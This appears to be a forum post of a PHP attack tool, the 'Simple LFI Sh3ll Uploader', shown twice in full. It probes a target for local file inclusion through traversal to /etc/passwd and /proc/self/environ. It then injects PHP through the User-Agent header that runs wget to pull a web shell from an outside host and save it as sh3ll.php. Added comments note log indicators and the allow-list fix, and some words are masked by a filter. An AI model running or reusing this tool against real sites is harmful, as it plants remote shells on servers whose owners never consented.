[align=LEFT][php]
<html>
<head>
<title>Simple LFI Sh3ll Uploader</title>
<style type="****/css">
**** {
background-color: #000000;
font-family:"Courier New";
color: silver;
font-size:11px;
}
input {
background-color: #000000;
font-family:"Courier New";
color: silver;
font-size:11px;
border:1px solid;
border-color:silver;
}
</style>
</head>
<****>
<h3>Simple LFI Sh3ll Uploader</h3>
<form method="post" action="">
LFI URL: <input type="****" size="60" ****="lfiurl" value="">
<input type="submit" value="Fvck that!">
</form>
<?php
// Handler for the form above: runs only when a non-empty 'lfiurl' value was posted.
// It works in three stages against the posted URL: a file-inclusion probe, a check
// that the process environment can be read through the same inclusion, and a request
// that carries PHP code in its User-Agent header.
//
// Defender view, based on what this code puts on the wire:
//  - access logs show long runs of "../" ending in etc/passwd%00 and
//    proc/self/environ%00 appended to a script parameter;
//  - one HTTP/1.0 request arrives whose User-Agent is a PHP snippet calling system()
//    with wget, instead of a browser string;
//  - on success a file named sh3ll.php appears in the directory of the vulnerable
//    script and is fetched once right afterwards.
// The root cause on the target is a request parameter reaching an include/require
// path; restricting includes to a fixed allow-list removes it.
if($_POST['lfiurl']) {
print "<pre>";
$target = $_POST['lfiurl'];
// Traversal suffixes appended to the posted URL. "%00" is a URL-encoded NUL byte meant
// to cut off anything the target script appends to the path; PHP builds that reject
// NUL bytes in file paths do not honour it.
$testlfi = "../../../../../../../../../../../../../../../etc/passwd%00";
$readenv = "../../../../../../../../../../../../../../../proc/self/environ%00";
// Split the posted URL around ".php" (the dot is unescaped, so it matches any
// character), then split the leading part on "/" to get scheme, host and path pieces.
$mbooh = preg_split("/.php/", $target);
$pecah = preg_split("/\//", $mbooh[0]);
$path = "/";
$azz = count($pecah) - 1;
// Segments 3 .. last-1 form the directory of the script; segment 2 is the host when
// the URL has the form scheme://host/...
for($g = 3; $g<$azz;$g++) {
$path.= $pecah[$g]."/";
}
// Script file name plus whatever followed ".php" in the posted URL
// (presumably the query string up to the injectable parameter - not verified here).
$bug = $pecah[$azz].".php".$mbooh[1];
$host = $pecah[2];
print "[+] Testing LFI ... ";
flush();
// Stage 1: the probe counts as successful when the response contains the
// "root:x:0:0" text of a passwd file.
$res = FetchURL($target.$testlfi);
if(preg_match("/root:x:0:0/", $res)) {
print "<font color='green'>Ok</font><br>[+] Reading /proc/self/environ ... ";
flush();
// Stage 2: same inclusion, pointed at the process environment.
// NOTE(review): the asterisks in the pattern below look like forum word-filter
// masking, so the pattern shown is not the author's original text.
$rez = FetchURL($target.$readenv);
if(preg_match("/********_ROOT=/", $rez)) {
print "<font color='green'>Ok</font><br>[+] Exploiting target ... <br>";
flush();
// Stage 3: the PHP snippet below is sent as the User-Agent of a hand-built HTTP/1.0
// request to port 80 that asks for the environ inclusion again. The socket is closed
// right after writing, so the response is never read. The download URL in the snippet
// is an indicator worth searching for in proxy and web-server logs.
$cmd = "<?php system('wget http://www.dallasdesigngroup.com/UserFiles/sh3ll.txt -O sh3ll.php');?>";
$soket = fsockopen($host, 80);
$req = "GET ".$path.$bug.$readenv." HTTP/1.0\r\nHost: ".$host."\r\nAccept: */*\r\nUser-Agent: ".$cmd."\r\n\r\n";
fputs($soket, $req);
fclose($soket);
flush();
// Verification: fetch the expected drop location and look for the marker string
// "gblack Was Here" in the response; that string is a usable content signature for
// scanning web roots.
$cek = FetchURL("http://".$host.$path."sh3ll.php");
if(preg_match("/gblack Was Here/", $cek)) {
print "[+] Exploit successful!<br>[+] Shell uploaded to <font color='green'>http://".$host.$path."sh3ll.php</font>";
} else {
print "<font color='red'>[!] Exploit failed!</font><br>";
}
}
else {
// The environment file was not readable through the inclusion.
print "<font color='red'>Failed</font><br>";
}
} else {
// The passwd probe did not return the expected text.
print "<font color='red'>Failed</font><br>";
}
}
/**
 * Fetch a URL with cURL and return the raw response as a string.
 *
 * Every request carries the same hard-coded Firefox 2-era User-Agent, which makes
 * the probe and verification requests easy to correlate in access logs. Response
 * headers are included in the returned string (CURLOPT_HEADER), so callers match
 * against headers and body together. The transfer times out after 30 seconds.
 * The cURL handle is never closed with curl_close().
 *
 * @param string $url Address to request.
 * @return string|false Response text, or false when curl_exec() returns a falsy
 *                      value (a failed transfer, but also an empty response).
 */
function FetchURL($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)");
// NOTE(review): the option name below is partly masked by what looks like a forum
// word filter; as shown it is not a defined cURL constant.
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if(!$data) {
return false;
}
return $data;
}
?>
<br>
Copyleft © 2010 by gblack
</****>
</html>
[/php][/align]
<html>
<head>
<title>Simple LFI Sh3ll Uploader</title>
<style type="****/css">
**** {
background-color: #000000;
font-family:"Courier New";
color: silver;
font-size:11px;
}
input {
background-color: #000000;
font-family:"Courier New";
color: silver;
font-size:11px;
border:1px solid;
border-color:silver;
}
</style>
</head>
<****>
<h3>Simple LFI Sh3ll Uploader</h3>
<form method="post" action="">
LFI URL: <input type="****" size="60" ****="lfiurl" value="">
<input type="submit" value="Fvck that!">
</form>
<?php
// Handler for the form above: runs only when a non-empty 'lfiurl' value was posted.
// It works in three stages against the posted URL: a file-inclusion probe, a check
// that the process environment can be read through the same inclusion, and a request
// that carries PHP code in its User-Agent header.
//
// Defender view, based on what this code puts on the wire:
//  - access logs show long runs of "../" ending in etc/passwd%00 and
//    proc/self/environ%00 appended to a script parameter;
//  - one HTTP/1.0 request arrives whose User-Agent is a PHP snippet calling system()
//    with wget, instead of a browser string;
//  - on success a file named sh3ll.php appears in the directory of the vulnerable
//    script and is fetched once right afterwards.
// The root cause on the target is a request parameter reaching an include/require
// path; restricting includes to a fixed allow-list removes it.
if($_POST['lfiurl']) {
print "<pre>";
$target = $_POST['lfiurl'];
// Traversal suffixes appended to the posted URL. "%00" is a URL-encoded NUL byte meant
// to cut off anything the target script appends to the path; PHP builds that reject
// NUL bytes in file paths do not honour it.
$testlfi = "../../../../../../../../../../../../../../../etc/passwd%00";
$readenv = "../../../../../../../../../../../../../../../proc/self/environ%00";
// Split the posted URL around ".php" (the dot is unescaped, so it matches any
// character), then split the leading part on "/" to get scheme, host and path pieces.
$mbooh = preg_split("/.php/", $target);
$pecah = preg_split("/\//", $mbooh[0]);
$path = "/";
$azz = count($pecah) - 1;
// Segments 3 .. last-1 form the directory of the script; segment 2 is the host when
// the URL has the form scheme://host/...
for($g = 3; $g<$azz;$g++) {
$path.= $pecah[$g]."/";
}
// Script file name plus whatever followed ".php" in the posted URL
// (presumably the query string up to the injectable parameter - not verified here).
$bug = $pecah[$azz].".php".$mbooh[1];
$host = $pecah[2];
print "[+] Testing LFI ... ";
flush();
// Stage 1: the probe counts as successful when the response contains the
// "root:x:0:0" text of a passwd file.
$res = FetchURL($target.$testlfi);
if(preg_match("/root:x:0:0/", $res)) {
print "<font color='green'>Ok</font><br>[+] Reading /proc/self/environ ... ";
flush();
// Stage 2: same inclusion, pointed at the process environment.
// NOTE(review): the asterisks in the pattern below look like forum word-filter
// masking, so the pattern shown is not the author's original text.
$rez = FetchURL($target.$readenv);
if(preg_match("/********_ROOT=/", $rez)) {
print "<font color='green'>Ok</font><br>[+] Exploiting target ... <br>";
flush();
// Stage 3: the PHP snippet below is sent as the User-Agent of a hand-built HTTP/1.0
// request to port 80 that asks for the environ inclusion again. The socket is closed
// right after writing, so the response is never read. The download URL in the snippet
// is an indicator worth searching for in proxy and web-server logs.
$cmd = "<?php system('wget http://www.dallasdesigngroup.com/UserFiles/sh3ll.txt -O sh3ll.php');?>";
$soket = fsockopen($host, 80);
$req = "GET ".$path.$bug.$readenv." HTTP/1.0\r\nHost: ".$host."\r\nAccept: */*\r\nUser-Agent: ".$cmd."\r\n\r\n";
fputs($soket, $req);
fclose($soket);
flush();
// Verification: fetch the expected drop location and look for the marker string
// "gblack Was Here" in the response; that string is a usable content signature for
// scanning web roots.
$cek = FetchURL("http://".$host.$path."sh3ll.php");
if(preg_match("/gblack Was Here/", $cek)) {
print "[+] Exploit successful!<br>[+] Shell uploaded to <font color='green'>http://".$host.$path."sh3ll.php</font>";
} else {
print "<font color='red'>[!] Exploit failed!</font><br>";
}
}
else {
// The environment file was not readable through the inclusion.
print "<font color='red'>Failed</font><br>";
}
} else {
// The passwd probe did not return the expected text.
print "<font color='red'>Failed</font><br>";
}
}
/**
 * Fetch a URL with cURL and return the raw response as a string.
 *
 * Every request carries the same hard-coded Firefox 2-era User-Agent, which makes
 * the probe and verification requests easy to correlate in access logs. Response
 * headers are included in the returned string (CURLOPT_HEADER), so callers match
 * against headers and body together. The transfer times out after 30 seconds.
 * The cURL handle is never closed with curl_close().
 *
 * @param string $url Address to request.
 * @return string|false Response text, or false when curl_exec() returns a falsy
 *                      value (a failed transfer, but also an empty response).
 */
function FetchURL($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)");
// NOTE(review): the option name below is partly masked by what looks like a forum
// word filter; as shown it is not a defined cURL constant.
curl_setopt($ch, CURLOPT_FOLLOW********, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if(!$data) {
return false;
}
return $data;
}
?>
<br>
Copyleft © 2010 by gblack
</****>
</html>
[/php][/align]